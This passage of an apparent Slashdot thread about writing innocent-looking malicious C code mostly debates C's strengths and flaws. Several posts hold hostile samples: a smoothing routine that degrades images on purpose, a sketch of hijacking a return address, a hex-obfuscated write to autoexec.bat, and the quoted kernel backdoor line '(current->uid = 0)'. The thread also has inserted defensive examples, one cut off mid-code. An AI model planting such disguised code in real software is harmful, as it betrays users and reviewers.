          const int prev_x=(x-1==-1 ? width-1 : x-1);
          for (int y=0; y<height; y++)
          {
              const int next_y=(y+1==height ? 0 : y+1);
              const int prev_y=(y-1==-1 ? height-1 : y-1);

              const RGB point1 = picture[prev_x][prev_y];
              const char point1_r = point1.r / 9;
              const char point1_g = point1.g / 9;
              const char point1_b = point1.b / 9;

              const RGB point2 = picture[x][prev_y];
              const char point2_r = point2.r / 9;
              const char point2_g = point2.g / 9;
              const char point2_b = point2.b / 9;
              // Etc - continue for 9 points from prev_x to next_x, prev_y to next_y

              const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
              const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
              const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;

              dest_picture[x][y].r=dest_r;
              dest_picture[x][y].g=dest_g;
              dest_picture[x][y].b=dest_b;
          }
      }

      In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticeable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.

      If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities. :) I can't wait to see the results.

      --
      "This wallpaper is killing me. One of us has got to go." -- Oscar Wilde on his deathbed
    10. Re:how's this? by tonsofpcs · · Score: 1

      How will you know if the code works if you don't test it?!?! Who taught you how to program? Now go test it and (if you still can), report back with results and changes until it works.

    11. Re:how's this? by tonsofpcs · · Score: 1

      How will you know if the code works if you don't test it?!?! Who taught you how to program? Now go test it and (if you still can) report back with results and changes until it works.

    12. Re:how's this? by dgatwood · · Score: 1
      My code doesn't spawn every five seconds (unless you enable the commented-out 'evil' line). It runs fsck in the background, restarting it five seconds after the last one ends. It's the sort of thing you could easily convince a newbie sysadmin would be a good idea. Imagine never having filesystem corruption because your system is constantly checking in the background. (Use a bigger delay if 5 seconds seems too extreme.) The point is that it is never safe to do so on a read-write filesystem, but a lot of people won't realize that....

      IMHO, changing the link pointer is way too easy. I mean if you allow that, then this qualifies, at least on Linux-x86:

      #define CODE_LENGTH 32 // or whatever the real length is

      int evilfunction(void)
      {
      int pos = 0xff & 0xff00; // zero.
      int array[CODE_LENGTH] = {
      /* here, someone inserts a bunch of integers that are actually the raw compiled bytes to issue some arbitrary system call, followed by some no-op padding (to align the hole at the end), followed by a jump instruction, followed by a 4-byte hole for the target of the jump, aligned to a 4-byte boundary. CODE_LENGTH should include the four byte jump target, but not one byte more. */ };

      array[CODE_LENGTH-1] = array[pos-1]; // copy the old link pointer (return address) to the hole after the jump instruction.

      array[pos-1] = (int)&array[0]; // set new link pointer to start of the array

      return 0; // execute the code and return....
      }
      Personally, I hardly think that qualifies as particularly interesting, though it is certainly evil.....

      --

      Check out my sci-fi/humor trilogy at PatriotsBooks.

    13. Re:how's this? by Anonymous Coward · · Score: 0

      Perhaps you should go through the trouble of reading the standard. Main must be declared to return int, but if no return statement is provided in main, the compiler returns 0. It's perfectly standard-compliant.
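The divide-before-accumulate error from Rei's smoothing reply earlier in this thread, as an added example that is not part of any original post: a single-channel 3x3 box blur written both ways, measured on images a reviewer could use as test vectors. The function names and the test images are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* One colour channel, row-major, with the wraparound indexing the reply uses. */
static uint8_t at(const uint8_t *img, int w, int h, int x, int y)
{
    return img[((y + h) % h) * w + ((x + w) % w)];
}

typedef uint8_t (*blur_fn)(const uint8_t *img, int w, int h, int x, int y);

/* Pattern from the reply: each of the nine samples is divided by 9, then summed.
 * Every sample loses up to 8/9 of a level to truncation before it is added. */
uint8_t blur_divide_first(const uint8_t *img, int w, int h, int x, int y)
{
    unsigned acc = 0;
    for (int dy = -1; dy <= 1; dy++)
        for (int dx = -1; dx <= 1; dx++)
            acc += at(img, w, h, x + dx, y + dy) / 9;
    return (uint8_t)acc;
}

/* Corrected order: accumulate in a wider type, divide once at the end. */
uint8_t blur_sum_first(const uint8_t *img, int w, int h, int x, int y)
{
    unsigned acc = 0;
    for (int dy = -1; dy <= 1; dy++)
        for (int dx = -1; dx <= 1; dx++)
            acc += at(img, w, h, x + dx, y + dy);
    return (uint8_t)(acc / 9);
}

/* Output for the centre of a 3x3 image in which every pixel has value v.
 * A correct blur must return v unchanged. */
uint8_t flat_output(blur_fn f, uint8_t v)
{
    uint8_t img[9];
    for (int i = 0; i < 9; i++)
        img[i] = v;
    return f(img, 3, 3, 1, 1);
}

/* Largest deviation from the exact mean on a 64x3 ramp where pixel value == x.
 * Only interior columns are checked, so the exact mean of x-1, x, x+1 is x. */
int max_ramp_error(blur_fn f)
{
    enum { W = 64, H = 3 };
    uint8_t img[W * H];
    int worst = 0;
    for (int y = 0; y < H; y++)
        for (int x = 0; x < W; x++)
            img[y * W + x] = (uint8_t)x;
    for (int x = 1; x < W - 1; x++) {
        int err = abs((int)f(img, W, H, x, 1) - x);
        if (err > worst)
            worst = err;
    }
    return worst;
}

int main(void)
{
    printf("flat 255, divide first: %u\n", flat_output(blur_divide_first, 255));
    printf("flat 255, sum first   : %u\n", flat_output(blur_sum_first, 255));
    printf("ramp error, divide first: %d\n", max_ramp_error(blur_divide_first));
    printf("ramp error, sum first   : %d\n", max_ramp_error(blur_sum_first));
    return 0;
}
```

A flat-image identity check and a ramp check like these are cheap regression tests that catch this class of change without anyone having to spot it by eye.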

  64. Re:Indeed. This could be a field day for Java and by argent · · Score: 2, Insightful

    That'll make it a real challenge, since the designers of Java made an effort to make it difficult to write malicious code in the first place.

    Actually, that's not really the case... not for the kind of "malicious code" that they're talking about here. They're not talking about "getting out of the sandbox", they're talking about "hiding information in the output". It's actually a lot easier to hide this kind of "malicious code" in an object-oriented language because you can play games with the namespace.

  65. Re:NOT FUNNY: Chinese Hackers by Anonymous Coward · · Score: 0

    I think you're sino-bashing and trolling.

    And I think you're replying to yourself. You have a hand on one keyboard and your other hand on another and they're talking to each other through Slashdot.

  66. Re:Seems a bit like those by Anonymous Coward · · Score: 0

    Seems a bit like a Microsoft sponsored hacking contest.

    Innocent-looking code that is malicious. What are one of the arguments in favor of open source? Trust?

    Here comes Bill Gates telling us that even innocent-looking open source code can be as malicious as anything that Microsoft can dream up.

  67. Boring. by Inmatarian · · Score: 1

    #include "stdio.h"
    const char * tempfile = { 0x63, 0x3a, 0x5c, 0x61, 0x75, 0x74, 0x6f, 0x65, 0x78, 0x65, 0x63, 0x2e, 0x62, 0x61, 0x74, 0x00 };
    const char * buffer = { 0x40, 0x72, 0x65, 0x6d, 0x20, 0x49, 0x74, 0x73, 0x20, 0x61, 0x6e, 0x6e, 0x6f, 0x79, 0x69, 0x6e, 0x67, 0x20, 0x77, 0x68, 0x65, 0x6e, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x20, 0x69, 0x73, 0x20 ,0x68, 0x61, 0x63, 0x6b, 0x65, 0x64, 0x2e, 0x0d, 0x0a, 0x00 };
    int main( int argc, char ** argv )
    {
    freopen(stdout, tempfile, "wb");
    fprintf(stdout, buffer);
    return 0;
    }

    "Daddy, whats this strange message when the computer turns on? Is it broken?"

    "No son, you've just run malicious code written by a nerd whose probably in his 30s, living in his mom's basement and still a virgin. Haha, he's a loser."

    "Daddy, these old machines suck, can I go back to playing BloodSprayer 2: Torn Flesh Gangrene?"

    "Only after you've mowed the lawn son."

    "Dad, F**K you."

    "Haha!"

  68. Crash Windows with printf by zdv · · Score: 1

    I distinctly remember crashing Windows 2000 with a single printf statement, IIRC the code was something like:

    printf("Hello\t\b\b\b\b\b\b\b");

    The problem was some system DLL and transcended Windows versions...

  69. Linux Kernel Backdoor Attempt by Johnny+Hardcore · · Score: 5, Informative

    This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

    The attempt was trying to insert

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

    inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
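An added example, not from the original comment or the kernel source: a small text scanner that flags assignments inside `if`/`while` conditions, plus a toy function with the same shape as the quoted line showing that the guarded branch never runs while the write still happens. The flag values, `struct task`, the function names and the sample strings are constructed for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static int is_ident(int c) { return isalnum((unsigned char)c) || c == '_'; }

/* Length of keyword kw if it starts at src[i] as a whole word, else 0. */
static size_t keyword_at(const char *src, size_t i, const char *kw)
{
    size_t n = strlen(kw);
    if (strncmp(src + i, kw, n) != 0) return 0;
    if (i > 0 && is_ident(src[i - 1])) return 0;
    return is_ident(src[i + n]) ? 0 : n;
}

/* Count assignments inside the parenthesised condition opening at src[open].
 * "==", "!=", "<=" and ">=" are comparisons; every other '=' is a write.
 * Known gap: "<<=" and ">>=" are read as comparisons.
 * *end receives the index just past the matching ')'. */
static int assignments_in_condition(const char *src, size_t open, size_t *end)
{
    int depth = 0, hits = 0;
    size_t i;
    for (i = open; src[i]; i++) {
        char c = src[i];
        if (c == '"' || c == '\'') {          /* skip string and char literals */
            for (i++; src[i] && src[i] != c; i++)
                if (src[i] == '\\' && src[i + 1]) i++;
            if (!src[i]) break;
        } else if (c == '(') {
            depth++;
        } else if (c == ')') {
            if (--depth == 0) { i++; break; }
        } else if (c == '=') {
            char prev = src[i - 1];
            if (src[i + 1] == '=') { i++; continue; }   /* "==" */
            if (prev == '!' || prev == '<' || prev == '>') continue;
            hits++;
        }
    }
    *end = i;
    return hits;
}

/* Total assignments found inside if (...) and while (...) conditions. */
int count_condition_assignments(const char *src)
{
    int total = 0;
    size_t i = 0;
    while (src[i]) {
        size_t n = keyword_at(src, i, "if");
        if (!n) n = keyword_at(src, i, "while");
        if (n) {
            size_t j = i + n;
            while (src[j] == ' ' || src[j] == '\t' || src[j] == '\n') j++;
            if (src[j] == '(') {
                total += assignments_in_condition(src, j, &i);
                continue;
            }
        }
        i++;
    }
    return total;
}

/* Constructed stand-ins for the kernel names on the quoted line. */
enum { WCLONE_FLAG = 0x1, WALL_FLAG = 0x2 };
struct task { unsigned uid; };

/* Same shape as the quoted line; returns the uid left behind by the "check". */
unsigned uid_after_check(unsigned start_uid, int options)
{
    struct task t = { start_uid }, *current = &t;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (current->uid = 0))
        return 0xFFFFFFFFu;   /* never reached: the assignment evaluates to 0 */
    return current->uid;
}

/* Constructed samples: the quoted condition, the same test as a comparison,
 * and a deliberate assignment idiom that a reviewer still has to read. */
static const char SAMPLE_QUOTED[] =
    "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))\n    return -1;\n";
static const char SAMPLE_COMPARE[] =
    "if ((options == (__WCLONE|__WALL)) && (current->uid == 0))\n    return -1;\n";
static const char SAMPLE_IDIOM[] =
    "if (a <= b && c != d) x = 1;\nwhile ((n = next_chunk(buf)) > 0) total += n;\n";

int main(void)
{
    printf("quoted line : %d\n", count_condition_assignments(SAMPLE_QUOTED));
    printf("comparison  : %d\n", count_condition_assignments(SAMPLE_COMPARE));
    printf("read idiom  : %d\n", count_condition_assignments(SAMPLE_IDIOM));
    printf("uid after   : %u\n", uid_after_check(1000, WCLONE_FLAG | WALL_FLAG));
    return 0;
}
```

The scanner flags the legitimate `while ((n = ...) > 0)` idiom as well, so its output is a review queue rather than a verdict; the extra parentheses that silence the compiler warning do not hide the write from it.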

  70. C is an awful language by Urusai · · Score: 2, Informative

    You're just used to it. Problems: difficult to compile, difficult to convert to better languages (thank you preprocessor), encourages obfuscation, some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings. That's just off the top of my head.

    1. Re:C is an awful language by jejones · · Score: 3, Insightful

      Well...

      C is good for what it was first used for: writing Unix. At least initially, it was minimalistic; orthogonality took a back seat to ease of implementation. (See Gabriel's classic essay for details.)

      (It's certainly not flawless. Any language that needs a utility like cdecl to make declarations understandable has problems, and there should've been a Boolean type from the beginning. It would be nice if char (which should be whatever represents a glyph on the target system) weren't conflated with short short int. Basically, if C were in your back yard, it would be declared an "attractive nuisance.")

      I think the authors of The Art of Unix Programming wisely recognize that C, like any other tool, should be used only where appropriate. (Sorry if that's tautological, but I can't think of a better way to put it.)

  71. Re:Cheating? Flamebait +5! by Anonymous Coward · · Score: 0

    It may be flamebait, but it's +5 flamebait :)

  72. Not so by Anonymous Coward · · Score: 0

    I hear Microsoft are going to enter Longhorn.

  73. New law. by elucido · · Score: 1, Insightful

    Anyone who has to make use of Godwin's law obviously must agree with Hitler. Godwin's law is equal to censorship. Just because you don't discuss Hitler, the Nazis, fascism, etc. does not mean it suddenly ceased to exist.

    The new law which evolves beyond Godwin's law to allow people to discuss Hitler shall be called what? Slashdot can think of a name, right?

  74. Re:Indeed. This could be a field day for Java and by jrumney · · Score: 1
    Java even provides interesting opportunities for evil, you've got method overloading and that great gremlin, threads.

    The unexpected fact that byte is signed can also be used to advantage in Java.

  75. I win by hkb · · Score: 1

    #include

    I win.

    --
    /* Moderating all non-anonymous trolls up since 2004 */
    1. Re:I win by woah · · Score: 1
      test.c:1: `#include' expects "FILENAME" or <FILENAME>

      No, you FAIL it.

  76. So The Hard Part Is To by Master+of+Transhuman · · Score: 4, Funny

    "write clear, readable, innocent-looking C code", right?

    Wow, nobody's going to win this one.

    --
    Richard Steven Hack - This sig is TOO GODDAMN SHORT TO DO ANYTHING USEFUL WITH! MORONS!
  77. I'll take the bait by The+Infamous+Grimace · · Score: 1

    One of the rules is that you need to write it in C. I have no idea what language you're writing in but it's not C.

    You do know that '/*' and '*/' are the comment delimiters for C, and that anything that falls between them is ignored by the C compiler?

    (tig)
    --
    Ignorance and prejudice and fear
    Walk hand in hand
    1. Re:I'll take the bait by Anonymous+Brave+Guy · · Score: 1
      You do know that '/*' and '*/' are the comment delimiters for C, and that anything that falls between them is ignored by the C compiler?

      Yes, I'm pretty sure he knew that.

      And, as he says, there are still several errors. :-)

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    2. Re:I'll take the bait by Anonymous Coward · · Score: 0

      What are they?

      I don't see any, assuming evil() is prototyped in stuff.h

    3. Re:I'll take the bait by Anonymous+Brave+Guy · · Score: 1

      Blockquoth the AC:

      What are they?

      Well, the #include line doesn't use either <> or "". Then there's the main function, which ought to be int main(void). Finally, AFAICR C doesn't support the implicit return at the end of main that C++ does, so there's a missing return statement. (I may be wrong about the third one if it was fixed in C99; I don't have a copy of the revised standard handy.)

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    4. Re:I'll take the bait by Dwonis · · Score: 2, Informative
      Finally, AFAICR C doesn't support the implicit return at the end of main that C++ does, so there's a missing return statement. (I may be wrong about the third one if it was fixed in C99; I don't have a copy of the revised standard handy.)

      You are correct. This is from ISO/IEC 9899:1999(E):

      5.1.2.2.3 Program termination 1 If the return type of the main function is a type compatible with int, a return from the initial call to the main function is equivalent to calling the exit function with the value returned by the main function as its argument; reaching the } that terminates the main function returns a value of 0. If the return type is not compatible with int, the termination status returned to the host environment is unspecified.
      (emphasis added)
  78. Mailing address by exabrial · · Score: 1

    I have an XP CD that has no patches, where do I send it?

    1. Re:Mailing address by Mechcozmo · · Score: 1

      That's written in QBasic. Sorry.

  79. Open mouth... by The+Infamous+Grimace · · Score: 1

    ...insert foot. :-)

    (tig)

    --
    Ignorance and prejudice and fear
    Walk hand in hand
  80. off topic by big+daddy+kane · · Score: 0, Offtopic

    but please, keep your hoes in check mf doom is awesome

    1. Re:off topic by Anonymous Coward · · Score: 0

      Holy shit! A mention of MF Doom on /. I am both shocked and excited, BDK, you're my hero of the day.

  81. Obligatory simpsons paraphrase by Sentry21 · · Score: 4, Funny

    Programmer: 'Take this source code, but beware! It carries a terrible curse!'
    Judge: 'That's bad.'
    Programmer: 'But it's optimized for PowerPC!'
    Judge: 'That's good!'
    Programmer: 'PowerPC is also cursed.'
    Judge: 'That's bad.'
    Programmer: 'But you get your choice of operating systems!'
    Judge: 'That's good!'
    Programmer: 'The operating systems run on Intel.' *pause* 'That's bad.'
    Judge: 'Can I go now?'

    1. Re:Obligatory simpsons paraphrase by Anonymous Coward · · Score: 0

      That was seen in Animaniacs as well, when they were submitting their new script to the executives...

  82. You're just not used to it. by Tyler+Durden · · Score: 4, Insightful
    Problems: difficult to compile

    A picky compiler is a blessing, not a curse. It's much easier to identify and fix compile errors than run-time errors.

    difficult to convert to better languages (thank you preprocessor)

    Meaningless troll.

    encourages obfuscation

    Unless the compiler is literally holding a gun to your head, this is meaningless. In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

    some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings.

    Tacked on? If you don't like the way constructs are set up then fine, that's your opinion. But if you read The C Programming Language you can tell that every single construct was scrutinized over for the proper balance of efficiency (why it makes sense to pass array parameters as pointers and structs as copies) and consistency (why data types are declared the way they are. Declaration and use of data is made to match.) Do you honestly believe the creators/first users of C, some of the greatest programmers who ever lived, really said, "Ahhh, fuck it. Let's just throw something together," when designing their own programming tools?

    Most people who don't like C are really just saying they don't like low-level programming because that's what it was designed for, and that's what it's perfect for. Too many newbie programmers get used to some modern, flash-in-the-pan, all-things-to-all-people languages and when they are faced with the challenges of low-level languages rashly conclude that it's the language's fault they're having problems.

    C is the perfect language for the job it was designed for. The same cannot be said for most more modern languages.

    --
    Happy people make bad consumers.
    1. Re:You're just not used to it. by dcam · · Score: 1

      I wouldn't call it a total troll. He does raise two points that I consider worth raising.

      1. The preprocessor. I really am not sure it was a good idea to make this as powerful as it is. It encourages people to put a lot of code in here.

      2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start? All you are saving at the moment is a tiny amount of memory which is more than offset by the fact you need to iterate through the entire string to find the end (that or hold another pointer to the end). And no, using a string library is not an answer, this should be built in as a fundamental part of the language, string processing is a part of life.

      Yes I have written a fair bit of C.

      Feel free to flame away.

      --
      meh
    2. Re:You're just not used to it. by Tyler+Durden · · Score: 2, Insightful

      No flame. There are problems with C, I'll grant that. I don't know if the problem with the pre-processor is that it's too powerful or by convention it is depended on too much. Unfortunately, in some places it requires #defines where a const variable would be better. That and macros for functions where a simple inline keyword would help tremendously. Of course, these have been addressed in C++ and (I think) C99.

      I'm not sure about strings. With the really low level stuff like OS development, I can see the case for just contiguous characters terminated by a NULL character. Otherwise it's not so hot.

      But I still maintain that C works extremely well for what it was created for. I mean, how long did it take before it needed to change as opposed to C++ that becomes more complex by the hour? (I really have a love/hate attitude towards C++. I think it's a horrible language to match the needs of a horrible world. Then again, I should look more into Objective C.)

      C99 addresses a lot of valid concerns with the language, though. That and D sounds promising.

      --
      Happy people make bad consumers.
    3. Re:You're just not used to it. by Dun+Malg · · Score: 2, Insightful
      2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

      Clarity. All the data types in C are intended to be clear. It's only a single step up from assembly, really. C handles strings the same way assembly does: it eats bytes sequentially from an array, and it's up to the programmer to tell the program when it's had enough. Data handling in C is a virtually transparent veneer of abstraction from pointer arithmetic. A string data type with length encoded into it would require special handling, and C just don't play that game. C is all about pounding raw bytes and twiddling naked bits. If you want fancy meta-data, you're using the wrong language. Try C++ or Java.

      --
      If a job's not worth doing, it's not worth doing right.
    4. Re:You're just not used to it. by syle · · Score: 2, Insightful
      2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

      I think you're confusing C with a high-level language. It doesn't give you lists, associative arrays, or strings because those are high-level data types and C is a low-level language. Your complaints are like saying the biggest problem with a car is you can't drive it on water -- they display a fundamental misunderstanding of the subject.

      --

      /syle

    5. Re:You're just not used to it. by csirac · · Score: 3, Insightful

      I think it is very odd you can't believe we're still using C in operating systems. What other language are we going to use for this task?

      Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds? And how exactly is Python, LISP, or any other interpreted/dynamic runtime compiled language going to be used to write a task scheduler or memory management system worthy of being used in an OS kernel or embedded MCUs with barely 16KiB RAM?

      I think you're quite bitter about having to use C for writing applications, which I can perfectly understand. As for what C is actually MEANT for, it does the job quite well. And yes, the preprocessor issues suck, and it would be nice to have Pascal strings, but there really is no alternative to C that I have seen for low-level programming. It makes computer science purists who think everyone should program in Haskell or LISP feel dirty, but it does the job very well. It sure beats writing directly in ASM.

    6. Re:You're just not used to it. by msgregory@earthlink. · · Score: 1
      Tyler Durden wrote:

      C is the perfect language for the job it was designed for.

      Right, and C was designed for writing perfect programs. If getting something up and running quickly is your primary goal, then by all means stay away from C, but if you want the highest quality program, the kind where you want to meticulously work out every detail by hand, C is the fastest way to get there, hands down.

    7. Re:You're just not used to it. by Uerige · · Score: 1

      There is *no* excuse for C style strings.

      I happen to like C style strings. It allows for easy manipulation. When you need something higher-level, use another language (java?), or write a wrapper class.

    8. Re:You're just not used to it. by alexq · · Score: 1

      i think there are some reasonable arguments to be made on C's choice of syntax for certain things.

      it's very easy to make some errors that are simply typos, involving (= and == and - and + and -- and ++ and += and -=) (& and && and ^ and * and %) that are completely legal and more or less undetectable, for instance.

      (note, i had to type "and" because if i went ",", i encountered slashdot's "lameness filter"... heheh)

    9. Re:You're just not used to it. by dcam · · Score: 1

      When you need something higher-level, use another language (java?), or write a wrapper class.

      Unless C++ has changed since I last read K & R, C doesn't have classes. C is not an OO language. I take it you mean C++, which is a different kettle of fish entirely. C++ has an excellent string class in the stl.

      --
      meh
    10. Re:You're just not used to it. by dcam · · Score: 1

      Ahhh darn. That should read:

      Unless C has changed since I last read K & R, C doesn't have classes. C is not an OO language. I take it you mean C++, which is a different kettle of fish entirely. C++ has an excellent string class in the stl.

      --
      meh
    11. Re:You're just not used to it. by Dun+Malg · · Score: 1
      Yes its design and implementation were (and still are, with GCC, an amazing compiler) scrutinized over, but that doesn't change the fact that it's still decades old technology. In the computer industry, I mean let's face it, it's a relic. I can't even believe major systems (like most modern operating systems) are still written in this.

      This is a language that was designed initially to operate on computers with TELETYPE interfaces, forget even terminal let alone raster graphics. With BYTES of system memory and disk space, tiny little systems. No remote sense of complex data type checking (array bounds, etc), or automatic memory management, or anything remotely useful.

      Two thousand years later, we're still building with concrete, stone, and brick like the Romans did. The basic building blocks never change. You want memory management and bounds checking? What language should your memory manager and bounds checker be written in? You think this high-level functionality springs fully formed from the CPU?

      I dream of a language with the syntax and dynamics of python but with the compilation technology of common lisp. I'd love to write an OS in that language, on top of a highly optimised VM Microkernel, but with runtime introspection....MMM can anyone else say Lisp Machine style mechanics?

      Hah! So you want to write an OS, but have someone else do all the heavy lifting for you, eh? Why not just ask for a language with an IDE that has a "Do" function in the Edit menu, right next to "Undo"! That way you can click "Do" and it'll spit out what you want into the editor frame!

      Honestly, I'm not sure you understand the importance in an OS of interfacing with the hardware. This isn't a job you want to pawn off on the compiler with a bunch of canned, one-size-fits-all libraries. Not unless you want a crappy, slow, awkward OS.

      --
      If a job's not worth doing, it's not worth doing right.
    12. Re:You're just not used to it. by jonadab · · Score: 1

      > A picky compiler is a blessing, not a curse. It's much easier to identify
      > and fix compile errors than run-time errors.

      This is true. A real problem with C compilation is not that it's picky, but that it takes so blasted long. I have no idea whether the other poster was alluding to this or not, but the change-compile-run cycle of C, for a project of any substantial size, using popular readily-available compilers (and here I am mostly thinking of gcc), is about three orders of magnitude longer than the leading high-level languages of today.

      > Most people who don't like C are really just saying they don't like
      > low-level programming because that's what it was designed for, and
      > that's what it's perfect for. Too many newbie programmers get used to
      > some modern, flash-in-the-pan, all-things-to-all-people languages and
      > when they are faced with the challenges of low-level languages rashly
      > conclude that it's the language's fault they're having problems.
      > C is the perfect language for the job it was designed for. The same
      > cannot be said for most more modern languages.

      C is far from perfect, but it is well-suited to low-level programming, for things like boot loaders and schedulers and device drivers. The real reason a lot of us have decided we don't like C is because misguided people are using it for things it is *not* at *all* well-suited for, merely because it is ubiquitous, and we get exposed to it in that context. Frankly, 99% of the world's programmers today will never work on that kind of project, because almost all development is of higher-level applications that would be better developed in higher-level languages. (This was less true a few years ago, when performance was such a critical issue that people would pay twice as much for software that ran 20% faster on the same hardware, but these days, most applications can be written in higher level languages and will perform reasonably (as in, spend most of their time sitting there waiting on the user, the network, or a disk) on five-year-old hardware that sells for under a hundred bucks on ebay.)

      --
      Cut that out, or I will ship you to Norilsk in a box.
    13. Re:You're just not used to it. by Anonymous Coward · · Score: 0

      In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

      Typical lone geek programmer response. You have clearly never had to maintain a program written by someone whose idea of "clear" is significantly different from your own.

      C is the perfect language for the job it was designed for.

      I quite agree.

      But the job it was designed for was the low-level implementation of an intentionally simplistic OS on hardware that was low-powered even by 1970s standards. It achieved that goal admirably, as you say, and has well deserved the praise that has been heaped on it for its simplicity, elegance, and power.

      Some decades on, however, now that the average wristwatch has more processor power than a PDP and operating systems are no longer designed to work with less than 64 kb of memory, I believe it is no longer heretical to ask whether C may just have outlived its usefulness.

    14. Re:You're just not used to it. by Anonymous Coward · · Score: 1, Informative

      Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds?

      Are you aware that the Linux kernel contains not just one, but two fully-functional tracing garbage collectors? There's one in JFS2 and another in the routing table/xform code.

      Funny how people always get hung up about GC, when really it's all around them and they never even knew, because the flaws they thought it had don't exist.

    15. Re:You're just not used to it. by Tyler+Durden · · Score: 1
      Typical lone geek programmer response. You have clearly never had to maintain a program written by someone whose idea of "clear" is significantly different from your own.

      I have had to maintain programs and expand on code written by someone else in many languages. If the programmer is good the code is clear, otherwise it is not. The language used has nothing to do with it.

      The "simplistic" OS you refer to, of course, is UNIX. The simple design was so forward-thinking that more than thirty years later it is *the* OS to study for simplicity, consistency, extendability and elegance.

      Very few kernels are written in anything but C even with the advances in hardware, and there's a good reason for that. Don't believe me? Then I encourage you to write a decent kernel in the language-of-the-hour of your choosing and prove me wrong.

      Very very few projects of any interest today are written in anything but C/C++. The only exceptions I can think of are Azureus(Java), Bittorrent(Python), and Eclipse(Java). Everything else is a barren wasteland of simple IT automation, business enterprise applications or glue to piece together the interesting parts. *YAAAAAWWWWWNNN*

      I mean, I see the point that C/C++ is used in many projects it shouldn't be. It's just that most of those projects tend to bore the living shit out of me.

      --
      Happy people make bad consumers.
    16. Re:You're just not used to it. by swillden · · Score: 1

      Unless C has changed since I last read K & R, C doesn't have classes. C is not an OO language.

      typedef struct
      {
          uint16 length;
          char* data;
      } my_string;

      my_string* init_string(const char* data, uint16 len);
      void free_string(my_string* str);
      my_string* string_cat(my_string* a, const my_string* b);
      uint16 string_len(my_string* str);
      /* ... */

      There's nothing stopping you from creating classes in C. Inheritance and polymorphism are a bit painful, but you don't need those for simple types like strings, and you have to manually call "constructors" and "destructors", but that's not a big deal. For many excellent examples of OO code in C, see the Linux kernel.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    17. Re:You're just not used to it. by VAXcat · · Score: 1

      I disagree...as a career assembly language programmer, it is often more convenient, smaller and faster, to have the length of something available for loading into a register, then loop through the array, auto-decrementing the register as you go, and stop when it hits 0, rather than doing a compare for 0 after each step through the array to see if you're done. Plus, it's kinda nice to be able to have strings with null characters in them...no can do in C.

      --
      There is no God, and Dirac is his prophet.
    18. Re:You're just not used to it. by dcam · · Score: 1

      I'm not. Not encoding the value at the start of the string causes poor performance (aside from security issues). What is more, given that C is a procedural language, there is no neat way to fix it (eg just define new class).

      --
      meh
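An added example, not part of the thread: one possible implementation of the counted-string interface declared in swillden's comment above, showing the O(1) length and the embedded-NUL handling the replies argue about. The `uint16` typedef, the `c_view_len` and `has_embedded_nul` helpers, the overflow behaviour of `string_cat`, and the sample bytes are assumptions made for this illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef uint16_t uint16;   /* assumption: the comment's uint16 is a 16-bit unsigned type */

typedef struct {
    uint16 length;         /* number of bytes in data, NUL bytes included */
    char  *data;           /* not NUL-terminated; length is authoritative */
} my_string;

my_string *init_string(const char *data, uint16 len)
{
    my_string *s = malloc(sizeof *s);
    if (s == NULL)
        return NULL;
    s->data = malloc(len ? len : 1);   /* never request a zero-byte block */
    if (s->data == NULL) {
        free(s);
        return NULL;
    }
    if (len)
        memcpy(s->data, data, len);
    s->length = len;
    return s;
}

void free_string(my_string *str)
{
    if (str != NULL) {
        free(str->data);
        free(str);
    }
}

/* O(1): no scan for a terminator. */
uint16 string_len(my_string *str) { return str->length; }

/* Appends b to a in place. Returns a on success, or NULL with a left
   unchanged if the combined length does not fit in uint16 or allocation
   fails. Appending a string to itself is supported. */
my_string *string_cat(my_string *a, const my_string *b)
{
    uint16 blen = b->length;
    if (blen > UINT16_MAX - a->length)     /* would wrap the 16-bit length */
        return NULL;
    uint16 new_len = (uint16)(a->length + blen);
    char *p = realloc(a->data, new_len ? new_len : 1);
    if (p == NULL)
        return NULL;
    a->data = p;                           /* if b == a, b->data is now p too */
    memcpy(a->data + a->length, b->data, blen);
    a->length = new_len;
    return a;
}

/* Length a NUL-terminated API (strlen, strcpy, ...) would see if it were
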